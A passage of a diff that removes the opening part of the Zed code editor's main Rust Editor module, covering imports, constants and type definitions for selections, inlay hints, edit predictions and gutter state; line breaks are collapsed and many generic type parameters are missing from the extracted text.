HashMap, 
HashSet, VecDeque}; -use convert_case::{Case, Casing}; -use display_map::*; -pub use display_map::{ChunkRenderer, ChunkRendererContext, DisplayPoint, FoldPlaceholder}; -use editor_settings::GoToDefinitionFallback; -pub use editor_settings::{ - CurrentLineHighlight, EditorSettings, HideMouseMode, ScrollBeyondLastLine, SearchSettings, - ShowScrollbar, -}; -pub use editor_settings_controls::*; -use element::{AcceptEditPredictionBinding, LineWithInvisibles, PositionMap, layout_line}; -pub use element::{ - CursorLayout, EditorElement, HighlightedRange, HighlightedRangeLine, PointForPosition, -}; -use feature_flags::{DebuggerFeatureFlag, FeatureFlagAppExt}; -use futures::{ - FutureExt, - future::{self, Shared, join}, -}; -use fuzzy::StringMatchCandidate; - -use ::git::blame::BlameEntry; -use ::git::{Restore, blame::ParsedCommitMessage}; -use code_context_menus::{ - AvailableCodeAction, CodeActionContents, CodeActionsItem, CodeActionsMenu, CodeContextMenu, - CompletionsMenu, ContextMenuOrigin, -}; -use git::blame::{GitBlame, GlobalBlameRenderer}; -use gpui::{ - Action, Animation, AnimationExt, AnyElement, App, AppContext, AsyncWindowContext, - AvailableSpace, Background, Bounds, ClickEvent, ClipboardEntry, ClipboardItem, Context, - DispatchPhase, Edges, Entity, EntityInputHandler, EventEmitter, FocusHandle, FocusOutEvent, - Focusable, FontId, FontWeight, Global, HighlightStyle, Hsla, KeyContext, Modifiers, - MouseButton, MouseDownEvent, PaintQuad, ParentElement, Pixels, Render, ScrollHandle, - SharedString, Size, Stateful, Styled, Subscription, Task, TextStyle, TextStyleRefinement, - UTF16Selection, UnderlineStyle, UniformListScrollHandle, WeakEntity, WeakFocusHandle, Window, - div, impl_actions, point, prelude::*, pulsating_between, px, relative, size, -}; -use highlight_matching_bracket::refresh_matching_bracket_highlights; -use hover_links::{HoverLink, HoveredLinkState, InlayHighlight, find_file}; -pub use hover_popover::hover_markdown_style; -use 
hover_popover::{HoverState, hide_hover}; -use indent_guides::ActiveIndentGuidesState; -use inlay_hint_cache::{InlayHintCache, InlaySplice, InvalidationStrategy}; -pub use inline_completion::Direction; -use inline_completion::{EditPredictionProvider, InlineCompletionProviderHandle}; -pub use items::MAX_TAB_TITLE_LEN; -use itertools::Itertools; -use language::{ - AutoindentMode, BracketMatch, BracketPair, Buffer, Capability, CharKind, CodeLabel, - CursorShape, DiagnosticEntry, DiffOptions, EditPredictionsMode, EditPreview, HighlightedText, - IndentKind, IndentSize, Language, OffsetRangeExt, Point, Selection, SelectionGoal, TextObject, - TransactionId, TreeSitterOptions, WordsQuery, - language_settings::{ - self, InlayHintSettings, LspInsertMode, RewrapBehavior, WordsCompletionMode, - all_language_settings, language_settings, - }, - point_from_lsp, text_diff_with_options, -}; -use language::{BufferRow, CharClassifier, Runnable, RunnableRange, point_to_lsp}; -use linked_editing_ranges::refresh_linked_ranges; -use markdown::Markdown; -use mouse_context_menu::MouseContextMenu; -use persistence::DB; -use project::{ - ProjectPath, - debugger::{ - breakpoint_store::{ - BreakpointEditAction, BreakpointState, BreakpointStore, BreakpointStoreEvent, - }, - session::{Session, SessionEvent}, - }, -}; - -pub use git::blame::BlameRenderer; -pub use proposed_changes_editor::{ - ProposedChangeLocation, ProposedChangesEditor, ProposedChangesEditorToolbar, -}; -use smallvec::smallvec; -use std::{cell::OnceCell, iter::Peekable}; -use task::{ResolvedTask, RunnableTag, TaskTemplate, TaskVariables}; - -pub use lsp::CompletionContext; -use lsp::{ - CodeActionKind, CompletionItemKind, CompletionTriggerKind, DiagnosticSeverity, - InsertTextFormat, InsertTextMode, LanguageServerId, LanguageServerName, -}; - -use language::BufferSnapshot; -pub use lsp_ext::lsp_tasks; -use movement::TextLayoutDetails; -pub use multi_buffer::{ - Anchor, AnchorRangeExt, ExcerptId, ExcerptRange, MultiBuffer, 
MultiBufferSnapshot, PathKey, - RowInfo, ToOffset, ToPoint, -}; -use multi_buffer::{ - ExcerptInfo, ExpandExcerptDirection, MultiBufferDiffHunk, MultiBufferPoint, MultiBufferRow, - MultiOrSingleBufferOffsetRange, ToOffsetUtf16, -}; -use parking_lot::Mutex; -use project::{ - CodeAction, Completion, CompletionIntent, CompletionSource, DocumentHighlight, InlayHint, - Location, LocationLink, PrepareRenameResponse, Project, ProjectItem, ProjectTransaction, - TaskSourceKind, - debugger::breakpoint_store::Breakpoint, - lsp_store::{CompletionDocumentation, FormatTrigger, LspFormatTarget, OpenLspBufferHandle}, - project_settings::{GitGutterSetting, ProjectSettings}, -}; -use rand::prelude::*; -use rpc::{ErrorExt, proto::*}; -use scroll::{Autoscroll, OngoingScroll, ScrollAnchor, ScrollManager, ScrollbarAutoHide}; -use selections_collection::{ - MutableSelectionsCollection, SelectionsCollection, resolve_selections, -}; -use serde::{Deserialize, Serialize}; -use settings::{Settings, SettingsLocation, SettingsStore, update_settings_file}; -use smallvec::SmallVec; -use snippet::Snippet; -use std::sync::Arc; -use std::{ - any::TypeId, - borrow::Cow, - cell::RefCell, - cmp::{self, Ordering, Reverse}, - mem, - num::NonZeroU32, - ops::{ControlFlow, Deref, DerefMut, Not as _, Range, RangeInclusive}, - path::{Path, PathBuf}, - rc::Rc, - time::{Duration, Instant}, -}; -pub use sum_tree::Bias; -use sum_tree::TreeMap; -use text::{BufferId, FromAnchor, OffsetUtf16, Rope}; -use theme::{ - ActiveTheme, PlayerColor, StatusColors, SyntaxTheme, ThemeColors, ThemeSettings, - observe_buffer_font_size_adjustment, -}; -use ui::{ - ButtonSize, ButtonStyle, ContextMenu, Disclosure, IconButton, IconButtonShape, IconName, - IconSize, Key, Tooltip, h_flex, prelude::*, -}; -use util::{RangeExt, ResultExt, TryFutureExt, maybe, post_inc}; -use workspace::{ - Item as WorkspaceItem, ItemId, ItemNavHistory, OpenInTerminal, OpenTerminal, - RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection, 
TabBarSettings, Toast, - ViewId, Workspace, WorkspaceId, WorkspaceSettings, - item::{ItemHandle, PreviewTabsSettings}, - notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt}, - searchable::SearchEvent, -}; - -use crate::hover_links::{find_url, find_url_from_range}; -use crate::signature_help::{SignatureHelpHiddenBy, SignatureHelpState}; - -pub const FILE_HEADER_HEIGHT: u32 = 2; -pub const MULTI_BUFFER_EXCERPT_HEADER_HEIGHT: u32 = 1; -pub const DEFAULT_MULTIBUFFER_CONTEXT: u32 = 2; -const CURSOR_BLINK_INTERVAL: Duration = Duration::from_millis(500); -const MAX_LINE_LEN: usize = 1024; -const MIN_NAVIGATION_HISTORY_ROW_DELTA: i64 = 10; -const MAX_SELECTION_HISTORY_LEN: usize = 1024; -pub(crate) const CURSORS_VISIBLE_FOR: Duration = Duration::from_millis(2000); -#[doc(hidden)] -pub const CODE_ACTIONS_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(250); -const SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT: Duration = Duration::from_millis(100); - -pub(crate) const CODE_ACTION_TIMEOUT: Duration = Duration::from_secs(5); -pub(crate) const FORMAT_TIMEOUT: Duration = Duration::from_secs(5); -pub(crate) const SCROLL_CENTER_TOP_BOTTOM_DEBOUNCE_TIMEOUT: Duration = Duration::from_secs(1); - -pub(crate) const EDIT_PREDICTION_KEY_CONTEXT: &str = "edit_prediction"; -pub(crate) const EDIT_PREDICTION_CONFLICT_KEY_CONTEXT: &str = "edit_prediction_conflict"; -pub(crate) const MIN_LINE_NUMBER_DIGITS: u32 = 4; - -pub type RenderDiffHunkControlsFn = Arc< - dyn Fn( - u32, - &DiffHunkStatus, - Range, - bool, - Pixels, - &Entity, - &mut Window, - &mut App, - ) -> AnyElement, ->; - -const COLUMNAR_SELECTION_MODIFIERS: Modifiers = Modifiers { - alt: true, - shift: true, - control: false, - platform: false, - function: false, -}; - -struct InlineValueCache { - enabled: bool, - inlays: Vec, - refresh_task: Task>, -} - -impl InlineValueCache { - fn new(enabled: bool) -> Self { - Self { - enabled, - inlays: Vec::new(), - refresh_task: Task::ready(None), - } - } -} - -#[derive(Clone, 
Copy, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)] -pub enum InlayId { - InlineCompletion(usize), - Hint(usize), - DebuggerValue(usize), -} - -impl InlayId { - fn id(&self) -> usize { - match self { - Self::InlineCompletion(id) => *id, - Self::Hint(id) => *id, - Self::DebuggerValue(id) => *id, - } - } -} - -pub enum ActiveDebugLine {} -enum DocumentHighlightRead {} -enum DocumentHighlightWrite {} -enum InputComposition {} -enum SelectedTextHighlight {} - -pub enum ConflictsOuter {} -pub enum ConflictsOurs {} -pub enum ConflictsTheirs {} -pub enum ConflictsOursMarker {} -pub enum ConflictsTheirsMarker {} - -#[derive(Debug, Copy, Clone, PartialEq, Eq)] -pub enum Navigated { - Yes, - No, -} - -impl Navigated { - pub fn from_bool(yes: bool) -> Navigated { - if yes { Navigated::Yes } else { Navigated::No } - } -} - -#[derive(Debug, Clone, PartialEq, Eq)] -enum DisplayDiffHunk { - Folded { - display_row: DisplayRow, - }, - Unfolded { - is_created_file: bool, - diff_base_byte_range: Range, - display_row_range: Range, - multi_buffer_range: Range, - status: DiffHunkStatus, - }, -} - -pub enum HideMouseCursorOrigin { - TypingAction, - MovementAction, -} - -pub fn init_settings(cx: &mut App) { - EditorSettings::register(cx); -} - -pub fn init(cx: &mut App) { - init_settings(cx); - - cx.set_global(GlobalBlameRenderer(Arc::new(()))); - - workspace::register_project_item::(cx); - workspace::FollowableViewRegistry::register::(cx); - workspace::register_serializable_item::(cx); - - cx.observe_new( - |workspace: &mut Workspace, _: Option<&mut Window>, _cx: &mut Context| { - workspace.register_action(Editor::new_file); - workspace.register_action(Editor::new_file_vertical); - workspace.register_action(Editor::new_file_horizontal); - workspace.register_action(Editor::cancel_language_server_work); - }, - ) - .detach(); - - cx.on_action(move |_: &workspace::NewFile, cx| { - let app_state = workspace::AppState::global(cx); - if let Some(app_state) = app_state.upgrade() { - 
workspace::open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - Editor::new_file(workspace, &Default::default(), window, cx) - }, - ) - .detach(); - } - }); - cx.on_action(move |_: &workspace::NewWindow, cx| { - let app_state = workspace::AppState::global(cx); - if let Some(app_state) = app_state.upgrade() { - workspace::open_new( - Default::default(), - app_state, - cx, - |workspace, window, cx| { - cx.activate(true); - Editor::new_file(workspace, &Default::default(), window, cx) - }, - ) - .detach(); - } - }); -} - -pub fn set_blame_renderer(renderer: impl BlameRenderer + 'static, cx: &mut App) { - cx.set_global(GlobalBlameRenderer(Arc::new(renderer))); -} - -pub trait DiagnosticRenderer { - fn render_group( - &self, - diagnostic_group: Vec>, - buffer_id: BufferId, - snapshot: EditorSnapshot, - editor: WeakEntity, - cx: &mut App, - ) -> Vec>; - - fn render_hover( - &self, - diagnostic_group: Vec>, - range: Range, - buffer_id: BufferId, - cx: &mut App, - ) -> Option>; - - fn open_link( - &self, - editor: &mut Editor, - link: SharedString, - window: &mut Window, - cx: &mut Context, - ); -} - -pub(crate) struct GlobalDiagnosticRenderer(pub Arc); - -impl GlobalDiagnosticRenderer { - fn global(cx: &App) -> Option> { - cx.try_global::().map(|g| g.0.clone()) - } -} - -impl gpui::Global for GlobalDiagnosticRenderer {} -pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { - cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); -} - -pub struct SearchWithinRange; - -trait InvalidationRegion { - fn ranges(&self) -> &[Range]; -} - -#[derive(Clone, Debug, PartialEq)] -pub enum SelectPhase { - Begin { - position: DisplayPoint, - add: bool, - click_count: usize, - }, - BeginColumnar { - position: DisplayPoint, - reset: bool, - goal_column: u32, - }, - Extend { - position: DisplayPoint, - click_count: usize, - }, - Update { - position: DisplayPoint, - goal_column: u32, - scroll_delta: gpui::Point, - }, - 
End, -} - -#[derive(Clone, Debug)] -pub enum SelectMode { - Character, - Word(Range), - Line(Range), - All, -} - -#[derive(Copy, Clone, PartialEq, Eq, Debug)] -pub enum EditorMode { - SingleLine { - auto_width: bool, - }, - AutoHeight { - max_lines: usize, - }, - Full { - /// When set to `true`, the editor will scale its UI elements with the buffer font size. - scale_ui_elements_with_buffer_font_size: bool, - /// When set to `true`, the editor will render a background for the active line. - show_active_line_background: bool, - /// When set to `true`, the editor's height will be determined by its content. - sized_by_content: bool, - }, -} - -impl EditorMode { - pub fn full() -> Self { - Self::Full { - scale_ui_elements_with_buffer_font_size: true, - show_active_line_background: true, - sized_by_content: false, - } - } - - pub fn is_full(&self) -> bool { - matches!(self, Self::Full { .. }) - } -} - -#[derive(Copy, Clone, Debug)] -pub enum SoftWrap { - /// Prefer not to wrap at all. - /// - /// Note: this is currently internal, as actually limited by [`crate::MAX_LINE_LEN`] until it wraps. - /// The mode is used inside git diff hunks, where it's seems currently more useful to not wrap as much as possible. - GitDiff, - /// Prefer a single line generally, unless an overly long line is encountered. - None, - /// Soft wrap lines that exceed the editor width. - EditorWidth, - /// Soft wrap lines at the preferred line length. - Column(u32), - /// Soft wrap line at the preferred line length or the editor width (whichever is smaller). 
- Bounded(u32), -} - -#[derive(Clone)] -pub struct EditorStyle { - pub background: Hsla, - pub local_player: PlayerColor, - pub text: TextStyle, - pub scrollbar_width: Pixels, - pub syntax: Arc, - pub status: StatusColors, - pub inlay_hints_style: HighlightStyle, - pub inline_completion_styles: InlineCompletionStyles, - pub unnecessary_code_fade: f32, -} - -impl Default for EditorStyle { - fn default() -> Self { - Self { - background: Hsla::default(), - local_player: PlayerColor::default(), - text: TextStyle::default(), - scrollbar_width: Pixels::default(), - syntax: Default::default(), - // HACK: Status colors don't have a real default. - // We should look into removing the status colors from the editor - // style and retrieve them directly from the theme. - status: StatusColors::dark(), - inlay_hints_style: HighlightStyle::default(), - inline_completion_styles: InlineCompletionStyles { - insertion: HighlightStyle::default(), - whitespace: HighlightStyle::default(), - }, - unnecessary_code_fade: Default::default(), - } - } -} - -pub fn make_inlay_hints_style(cx: &mut App) -> HighlightStyle { - let show_background = language_settings::language_settings(cx).get() - .inlay_hints - .show_background; - - HighlightStyle { - color: Some(cx.theme().status().hint), - background_color: show_background.then(|| cx.theme().status().hint_background), - ..HighlightStyle::default() - } -} - -pub fn make_suggestion_styles(cx: &mut App) -> InlineCompletionStyles { - InlineCompletionStyles { - insertion: HighlightStyle { - color: Some(cx.theme().status().predictive), - ..HighlightStyle::default() - }, - whitespace: HighlightStyle { - background_color: Some(cx.theme().status().created_background), - ..HighlightStyle::default() - }, - } -} - -type CompletionId = usize; - -pub(crate) enum EditDisplayMode { - TabAccept, - DiffPopover, - Inline, -} - -enum InlineCompletion { - Edit { - edits: Vec<(Range, String)>, - edit_preview: Option, - display_mode: EditDisplayMode, - snapshot: 
BufferSnapshot, - }, - Move { - target: Anchor, - snapshot: BufferSnapshot, - }, -} - -struct InlineCompletionState { - inlay_ids: Vec, - completion: InlineCompletion, - completion_id: Option, - invalidation_range: Range, -} - -enum EditPredictionSettings { - Disabled, - Enabled { - show_in_menu: bool, - preview_requires_modifier: bool, - }, -} - -enum InlineCompletionHighlight {} - -#[derive(Debug, Clone)] -struct InlineDiagnostic { - message: SharedString, - group_id: usize, - is_primary: bool, - start: Point, - severity: DiagnosticSeverity, -} - -pub enum MenuInlineCompletionsPolicy { - Never, - ByProvider, -} - -pub enum EditPredictionPreview { - /// Modifier is not pressed - Inactive { released_too_fast: bool }, - /// Modifier pressed - Active { - since: Instant, - previous_scroll_position: Option, - }, -} - -impl EditPredictionPreview { - pub fn released_too_fast(&self) -> bool { - match self { - EditPredictionPreview::Inactive { released_too_fast } => *released_too_fast, - EditPredictionPreview::Active { .. } => false, - } - } - - pub fn set_previous_scroll_position(&mut self, scroll_position: Option) { - if let EditPredictionPreview::Active { - previous_scroll_position, - .. 
- } = self - { - *previous_scroll_position = scroll_position; - } - } -} - -pub struct ContextMenuOptions { - pub min_entries_visible: usize, - pub max_entries_visible: usize, - pub placement: Option, -} - -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum ContextMenuPlacement { - Above, - Below, -} - -#[derive(Copy, Clone, Eq, PartialEq, PartialOrd, Ord, Debug, Default)] -struct EditorActionId(usize); - -impl EditorActionId { - pub fn post_inc(&mut self) -> Self { - let answer = self.0; - - *self = Self(answer + 1); - - Self(answer) - } -} - -// type GetFieldEditorTheme = dyn Fn(&theme::Theme) -> theme::FieldEditor; -// type OverrideTextStyle = dyn Fn(&EditorStyle) -> Option; - -type BackgroundHighlight = (fn(&ThemeColors) -> Hsla, Arc<[Range]>); -type GutterHighlight = (fn(&App) -> Hsla, Arc<[Range]>); - -#[derive(Default)] -struct ScrollbarMarkerState { - scrollbar_size: Size, - dirty: bool, - markers: Arc<[PaintQuad]>, - pending_refresh: Option>>, -} - -impl ScrollbarMarkerState { - fn should_refresh(&self, scrollbar_size: Size) -> bool { - self.pending_refresh.is_none() && (self.scrollbar_size != scrollbar_size || self.dirty) - } -} - -#[derive(Clone, Debug)] -struct RunnableTasks { - templates: Vec<(TaskSourceKind, TaskTemplate)>, - offset: multi_buffer::Anchor, - // We need the column at which the task context evaluation should take place (when we're spawning it via gutter). - column: u32, - // Values of all named captures, including those starting with '_' - extra_variables: HashMap, - // Full range of the tagged region. We use it to determine which `extra_variables` to grab for context resolution in e.g. a modal. 
- context_range: Range, -} - -impl RunnableTasks { - fn resolve<'a>( - &'a self, - cx: &'a task::TaskContext, - ) -> impl Iterator + 'a { - self.templates.iter().filter_map(|(kind, template)| { - template - .resolve_task(&kind.to_id_base(), cx) - .map(|task| (kind.clone(), task)) - }) - } -} - -#[derive(Clone)] -struct ResolvedTasks { - templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>, - position: Anchor, -} - -#[derive(Copy, Clone, Debug, PartialEq, PartialOrd)] -struct BufferOffset(usize); - -// Addons allow storing per-editor state in other crates (e.g. Vim) -pub trait Addon: 'static { - fn extend_key_context(&self, _: &mut KeyContext, _: &App) {} - - fn render_buffer_header_controls( - &self, - _: &ExcerptInfo, - _: &Window, - _: &App, - ) -> Option { - None - } - - fn to_any(&self) -> &dyn std::any::Any; - - fn to_any_mut(&mut self) -> Option<&mut dyn std::any::Any> { - None - } -} - -/// A set of caret positions, registered when the editor was edited. -pub struct ChangeList { - changes: Vec>, - /// Currently "selected" change. - position: Option, -} - -impl ChangeList { - pub fn new() -> Self { - Self { - changes: Vec::new(), - position: None, - } - } - - /// Moves to the next change in the list (based on the direction given) and returns the caret positions for the next change. - /// If reaches the end of the list in the direction, returns the corresponding change until called for a different direction. - pub fn next_change(&mut self, count: usize, direction: Direction) -> Option<&[Anchor]> { - if self.changes.is_empty() { - return None; - } - - let prev = self.position.unwrap_or(self.changes.len()); - let next = if direction == Direction::Prev { - prev.saturating_sub(count) - } else { - (prev + count).min(self.changes.len() - 1) - }; - self.position = Some(next); - self.changes.get(next).map(|anchors| anchors.as_slice()) - } - - /// Adds a new change to the list, resetting the change list position. 
- pub fn push_to_change_list(&mut self, pop_state: bool, new_positions: Vec) { - self.position.take(); - if pop_state { - self.changes.pop(); - } - self.changes.push(new_positions.clone()); - } - - pub fn last(&self) -> Option<&[Anchor]> { - self.changes.last().map(|anchors| anchors.as_slice()) - } -} - -#[derive(Clone)] -struct InlineBlamePopoverState { - scroll_handle: ScrollHandle, - commit_message: Option, - markdown: Entity, -} - -struct InlineBlamePopover { - position: gpui::Point, - show_task: Option>, - hide_task: Option>, - popover_bounds: Option>, - popover_state: InlineBlamePopoverState, -} - -/// Represents a breakpoint indicator that shows up when hovering over lines in the gutter that don't have -/// a breakpoint on them. -#[derive(Clone, Copy, Debug)] -struct PhantomBreakpointIndicator { - display_row: DisplayRow, - /// There's a small debounce between hovering over the line and showing the indicator. - /// We don't want to show the indicator when moving the mouse from editor to e.g. project panel. - is_active: bool, - collides_with_existing_breakpoint: bool, -} -/// Zed's primary implementation of text input, allowing users to edit a [`MultiBuffer`]. -/// -/// See the [module level documentation](self) for more information. -pub struct Editor { - focus_handle: FocusHandle, - last_focused_descendant: Option, - /// The text buffer being edited - buffer: Entity, - /// Map of how text in the buffer should be displayed. - /// Handles soft wraps, folds, fake inlay text insertions, etc. - pub display_map: Entity, - pub selections: SelectionsCollection, - pub scroll_manager: ScrollManager, - /// When inline assist editors are linked, they all render cursors because - /// typing enters text into each of them, even the ones that aren't focused. 
- pub(crate) show_cursor_when_unfocused: bool, - columnar_selection_tail: Option, - add_selections_state: Option, - select_next_state: Option, - select_prev_state: Option, - selection_history: SelectionHistory, - autoclose_regions: Vec, - snippet_stack: InvalidationStack, - select_syntax_node_history: SelectSyntaxNodeHistory, - ime_transaction: Option, - active_diagnostics: ActiveDiagnostic, - show_inline_diagnostics: bool, - inline_diagnostics_update: Task<()>, - inline_diagnostics_enabled: bool, - inline_diagnostics: Vec<(Anchor, InlineDiagnostic)>, - soft_wrap_mode_override: Option, - hard_wrap: Option, - - // TODO: make this a access method - pub project: Option>, - semantics_provider: Option>, - completion_provider: Option>, - collaboration_hub: Option>, - blink_manager: Entity, - show_cursor_names: bool, - hovered_cursors: HashMap>, - pub show_local_selections: bool, - mode: EditorMode, - show_breadcrumbs: bool, - show_gutter: bool, - show_scrollbars: bool, - disable_scrolling: bool, - disable_expand_excerpt_buttons: bool, - show_line_numbers: Option, - use_relative_line_numbers: Option, - show_git_diff_gutter: Option, - show_code_actions: Option, - show_runnables: Option, - show_breakpoints: Option, - show_wrap_guides: Option, - show_indent_guides: Option, - placeholder_text: Option>, - highlight_order: usize, - highlighted_rows: HashMap>, - background_highlights: TreeMap, - gutter_highlights: TreeMap, - scrollbar_marker_state: ScrollbarMarkerState, - active_indent_guides_state: ActiveIndentGuidesState, - nav_history: Option, - context_menu: RefCell>, - context_menu_options: Option, - mouse_context_menu: Option, - completion_tasks: Vec<(CompletionId, Task>)>, - inline_blame_popover: Option, - signature_help_state: SignatureHelpState, - auto_signature_help: Option, - find_all_references_task_sources: Vec, - next_completion_id: CompletionId, - available_code_actions: Option<(Location, Rc<[AvailableCodeAction]>)>, - code_actions_task: Option>>, - 
quick_selection_highlight_task: Option<(Range, Task<()>)>, - debounced_selection_highlight_task: Option<(Range, Task<()>)>, - document_highlights_task: Option>, - linked_editing_range_task: Option>>, - linked_edit_ranges: linked_editing_ranges::LinkedEditingRanges, - pending_rename: Option, - searchable: bool, - cursor_shape: CursorShape, - current_line_highlight: Option, - collapse_matches: bool, - autoindent_mode: Option, - workspace: Option<(WeakEntity, Option)>, - input_enabled: bool, - use_modal_editing: bool, - read_only: bool, - leader_peer_id: Option, - remote_id: Option, - pub hover_state: HoverState, - pending_mouse_down: Option>>>, - gutter_hovered: bool, - hovered_link_state: Option, - edit_prediction_provider: Option, - code_action_providers: Vec>, - active_inline_completion: Option, - /// Used to prevent flickering as the user types while the menu is open - stale_inline_completion_in_menu: Option, - edit_prediction_settings: EditPredictionSettings, - inline_completions_hidden_for_vim_mode: bool, - show_inline_completions_override: Option, - menu_inline_completions_policy: MenuInlineCompletionsPolicy, - edit_prediction_preview: EditPredictionPreview, - edit_prediction_indent_conflict: bool, - edit_prediction_requires_modifier_in_indent_conflict: bool, - inlay_hint_cache: InlayHintCache, - next_inlay_id: usize, - _subscriptions: Vec, - pixel_position_of_newest_cursor: Option>, - gutter_dimensions: GutterDimensions, - style: Option, - text_style_refinement: Option, - next_editor_action_id: EditorActionId, - editor_actions: - Rc)>>>>, - use_autoclose: bool, - use_auto_surround: bool, - auto_replace_emoji_shortcode: bool, - jsx_tag_auto_close_enabled_in_any_buffer: bool, - show_git_blame_gutter: bool, - show_git_blame_inline: bool, - show_git_blame_inline_delay_task: Option>, - git_blame_inline_enabled: bool, - render_diff_hunk_controls: RenderDiffHunkControlsFn, - serialize_dirty_buffers: bool, - show_selection_menu: Option, - blame: Option>, - 
blame_subscription: Option, - custom_context_menu: Option< - Box< - dyn 'static - + Fn( - &mut Self, - DisplayPoint, - &mut Window, - &mut Context, - ) -> Option>, - >, - >, - last_bounds: Option>, - last_position_map: Option>, - expect_bounds_change: Option>, - tasks: BTreeMap<(BufferId, BufferRow), RunnableTasks>, - tasks_update_task: Option>, - breakpoint_store: Option>, - gutter_breakpoint_indicator: (Option, Option>), - in_project_search: bool, - previous_search_ranges: Option]>>, - breadcrumb_header: Option, - focused_block: Option, - next_scroll_position: NextScrollCursorCenterTopBottom, - addons: HashMap>, - registered_buffers: HashMap, - load_diff_task: Option>>, - selection_mark_mode: bool, - toggle_fold_multiple_buffers: Task<()>, - _scroll_cursor_center_top_bottom_task: Task<()>, - serialize_selections: Task<()>, - serialize_folds: Task<()>, - mouse_cursor_hidden: bool, - hide_mouse_mode: HideMouseMode, - pub change_list: ChangeList, - inline_value_cache: InlineValueCache, -} - -#[derive(Copy, Clone, Debug, PartialEq, Eq, Default)] -enum NextScrollCursorCenterTopBottom { - #[default] - Center, - Top, - Bottom, -} - -impl NextScrollCursorCenterTopBottom { - fn next(&self) -> Self { - match self { - Self::Center => Self::Top, - Self::Top => Self::Bottom, - Self::Bottom => Self::Center, - } - } -} - -#[derive(Clone)] -pub struct EditorSnapshot { - pub mode: EditorMode, - show_gutter: bool, - show_line_numbers: Option, - show_git_diff_gutter: Option, - show_code_actions: Option, - show_runnables: Option, - show_breakpoints: Option, - git_blame_gutter_max_author_length: Option, - pub display_snapshot: DisplaySnapshot, - pub placeholder_text: Option>, - is_focused: bool, - scroll_anchor: ScrollAnchor, - ongoing_scroll: OngoingScroll, - current_line_highlight: CurrentLineHighlight, - gutter_hovered: bool, -} - -#[derive(Default, Debug, Clone, Copy)] -pub struct GutterDimensions { - pub left_padding: Pixels, - pub right_padding: Pixels, - pub width: Pixels, - 
pub margin: Pixels, - pub git_blame_entries_width: Option, -} - -impl GutterDimensions { - /// The full width of the space taken up by the gutter. - pub fn full_width(&self) -> Pixels { - self.margin + self.width - } - - /// The width of the space reserved for the fold indicators, - /// use alongside 'justify_end' and `gutter_width` to - /// right align content with the line numbers - pub fn fold_area_width(&self) -> Pixels { - self.margin + self.right_padding - } -} - -#[derive(Debug)] -pub struct RemoteSelection { - pub replica_id: ReplicaId, - pub selection: Selection, - pub cursor_shape: CursorShape, - pub peer_id: PeerId, - pub line_mode: bool, - pub participant_index: Option, - pub user_name: Option, -} - -#[derive(Clone, Debug)] -struct SelectionHistoryEntry { - selections: Arc<[Selection]>, - select_next_state: Option, - select_prev_state: Option, - add_selections_state: Option, -} - -enum SelectionHistoryMode { - Normal, - Undoing, - Redoing, -} - -#[derive(Clone, PartialEq, Eq, Hash)] -struct HoveredCursor { - replica_id: u16, - selection_id: usize, -} - -impl Default for SelectionHistoryMode { - fn default() -> Self { - Self::Normal - } -} - -#[derive(Default)] -struct SelectionHistory { - #[allow(clippy::type_complexity)] - selections_by_transaction: - HashMap]>, Option]>>)>, - mode: SelectionHistoryMode, - undo_stack: VecDeque, - redo_stack: VecDeque, -} - -impl SelectionHistory { - fn insert_transaction( - &mut self, - transaction_id: TransactionId, - selections: Arc<[Selection]>, - ) { - self.selections_by_transaction - .insert(transaction_id, (selections, None)); - } - - #[allow(clippy::type_complexity)] - fn transaction( - &self, - transaction_id: TransactionId, - ) -> Option<&(Arc<[Selection]>, Option]>>)> { - self.selections_by_transaction.get(&transaction_id) - } - - #[allow(clippy::type_complexity)] - fn transaction_mut( - &mut self, - transaction_id: TransactionId, - ) -> Option<&mut (Arc<[Selection]>, Option]>>)> { - 
self.selections_by_transaction.get_mut(&transaction_id) - } - - fn push(&mut self, entry: SelectionHistoryEntry) { - if !entry.selections.is_empty() { - match self.mode { - SelectionHistoryMode::Normal => { - self.push_undo(entry); - self.redo_stack.clear(); - } - SelectionHistoryMode::Undoing => self.push_redo(entry), - SelectionHistoryMode::Redoing => self.push_undo(entry), - } - } - } - - fn push_undo(&mut self, entry: SelectionHistoryEntry) { - if self - .undo_stack - .back() - .map_or(true, |e| e.selections != entry.selections) - { - self.undo_stack.push_back(entry); - if self.undo_stack.len() > MAX_SELECTION_HISTORY_LEN { - self.undo_stack.pop_front(); - } - } - } - - fn push_redo(&mut self, entry: SelectionHistoryEntry) { - if self - .redo_stack - .back() - .map_or(true, |e| e.selections != entry.selections) - { - self.redo_stack.push_back(entry); - if self.redo_stack.len() > MAX_SELECTION_HISTORY_LEN { - self.redo_stack.pop_front(); - } - } - } -} - -#[derive(Clone, Copy)] -pub struct RowHighlightOptions { - pub autoscroll: bool, - pub include_gutter: bool, -} - -impl Default for RowHighlightOptions { - fn default() -> Self { - Self { - autoscroll: Default::default(), - include_gutter: true, - } - } -} - -struct RowHighlight { - index: usize, - range: Range, - color: Hsla, - options: RowHighlightOptions, - type_id: TypeId, -} - -#[derive(Clone, Debug)] -struct AddSelectionsState { - above: bool, - stack: Vec, -} - -#[derive(Clone)] -struct SelectNextState { - query: AhoCorasick, - wordwise: bool, - done: bool, -} - -impl std::fmt::Debug for SelectNextState { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - f.debug_struct(std::any::type_name::()) - .field("wordwise", &self.wordwise) - .field("done", &self.done) - .finish() - } -} - -#[derive(Debug)] -struct AutocloseRegion { - selection_id: usize, - range: Range, - pair: BracketPair, -} - -#[derive(Debug)] -struct SnippetState { - ranges: Vec>>, - active_index: usize, - choices: 
